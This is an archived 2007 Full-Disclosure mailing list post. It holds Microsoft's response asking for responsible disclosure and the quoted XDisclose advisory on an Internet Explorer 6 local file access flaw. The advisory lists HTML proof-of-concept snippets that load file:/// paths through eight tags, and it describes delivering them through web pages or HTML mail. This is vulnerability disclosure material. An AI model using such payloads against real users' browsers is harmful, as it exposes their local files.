[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability [7244ks]

To: "'Rajesh Sethumadhavan'" <rajesh.sethumadhavan@xxxxxxxxx>, "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability [7244ks]
From: Microsoft Security Response Center <secure@xxxxxxxxxxxxx>
Date: Mon, 19 Feb 2007 17:53:19 -0800

Hello Rajesh,

Thanks very much for your report. I have opened case 7244 and the case manager, 
kieron, will be in touch when there is more information. In the meantime, we 
ask you respect responsible disclosure guidelines and not report this publicly 
until users have an opportunity to protect themselves. You can review our 
bulletin acknowledgment policy at 
http://www.microsoft.com/technet/security/bulletin/policy.mspx and our general 
policies and practices at 
http://www.microsoft.com/technet/security/bulletin/info/msrpracs.mspx. If at 
any time you have questions or more information, please respond to this message.

Thank you,

Christine

-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Rajesh 
Sethumadhavan
Sent: Monday, February 19, 2007 2:14 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Microsoft Internet Explorer Local File Accesses 
Vulnerability

Microsoft Internet Explorer Local File Accesses Vulnerability

#####################################################################

XDisclose Advisory        : XD100099
Vulnerability Discovered : February 10th 07
Advisory Released         : February 20th 07
Credit                           : Rajesh Sethumadhavan

Class                           : Local File Accesses
Severity                        : Critical
Solution Status             : Unpatched
Vendor                         : Microsoft Corporation
Affected applications     : Microsoft Internet Explorer
Affected version            : Microsoft Internet Explorer 6 confirmed
                                    (Other versions may be also affected)
Affected Platform          : Windows XP Professional SP0,SP1,SP2
                                     Windows Home Edition SP0,SP1,SP2
                                     Windows 2003

#####################################################################


Overview:
Microsoft Internet Explorer is a default browser bundled with all versions of 
Microsoft Windows operating system.

Description:
A vulnerability has been identified in Microsoft Internet Explorer, (default 
installation) in windows XP service pack 2 which could be exploited by 
malicious users to obtain victims local files. This flaw is due to an error in 
the way Microsoft Internet explorer handles different html tags. Which could be 
exploited by a malicious remote user to obtain sensitive local files from the 
victim's computer.

Vulnerability Insight :
Microsoft Windows explorer is not handling various html tags like "img"
"script" "embed" "object" "param" "style" "bgsound" "body" "input"
(Other tags may be also vulnerable). By using the file protocol along with 
above tags it is possible to accesses victims local files.

a) Embed Tag Local file Accesses:
---------------------------------------------------------------------
<EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
---------------------------------------------------------------------

b) Object & Param Tag Local File Accesses:
---------------------------------------------------------------------
<object type="audio/x-mid" data=" file:///C:/test.mid <file:///C:/test.mid> " 
width="200"
height="20">
  <param name="src" value="file:///C:/test.mid">
  <param name="autoStart" value="true">
  <param name="autoStart" value="0">
</object>
---------------------------------------------------------------------

c) Body Tag Local File Accesses:
---------------------------------------------------------------------
<body background="file:///C:/test.gif" onload="alert('loading body bgrd 
success')" onerror="alert('loading body bgrd error')">
---------------------------------------------------------------------

d) Style Tag Local File Accesses:
---------------------------------------------------------------------
<STYLE type="text/css">BODY{background:url(" file:///C:/test.gif 
<file:///C:/test.gif> ")} </STYLE>
---------------------------------------------------------------------

e) Bgsound Tag Local File Accesses:
---------------------------------------------------------------------
<bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart= "true"/>
---------------------------------------------------------------------

f) Input Tag Local File Accesses:
---------------------------------------------------------------------
<form>
  <input type="image" src=" file:///C:/test.gif <file:///C:/test.gif> " 
onload="alert('loading
  input success')" onerror="alert('loading input error')"> </form>
---------------------------------------------------------------------

g) Image Tag Local File Accesses:
---------------------------------------------------------------------
<img src="file:///C:/test.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">
---------------------------------------------------------------------

h) Script Tag Local File Accesses:
---------------------------------------------------------------------
<script src="file:///C:/test.js"></script >
---------------------------------------------------------------------


Exploitation method:
- Creates a web page or an HTML Mail with the vulnerable code
- When the victim opens the mail or visit the vulnerable site it is
  possible to accesses his local files.

Demonstration:
Note: Demonstration will try to accesses few default images and wave files

- Visit the POC
- If vulnerable internet explorer is used it will show your local
  sample images and give a proper alert.

Solution:
No solution

Screenshot:
http://www.xdisclose.com/images/xdiscloselocalie.jpg

Proof Of Concept:
http://www.xdisclose.com/poc/xdiscloselocalie.html

Impact:
A Remote user can get accesses to victims local system files.

Scope of impact is limited to system level.

Original Advisory:
http://www.xdisclose.com/XD100099.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

Disclaimer:
This entire document is strictly for educational, testing and demonstrating 
purpose only. Modification use and/or publishing this information is entirely 
on your own risk. The exploit code is to be used on your testing environment 
only. I am not liable for any direct or indirect damages caused as a result of 
using the information or demonstrations provided in any part of this advisory.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
  - From: Rajesh Sethumadhavan

Prev by Date: Re: [Full-disclosure] Drive-by Pharming Threat
Next by Date: Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
Previous by thread: Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
Next by thread: Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
Index(es):
- Date
- Thread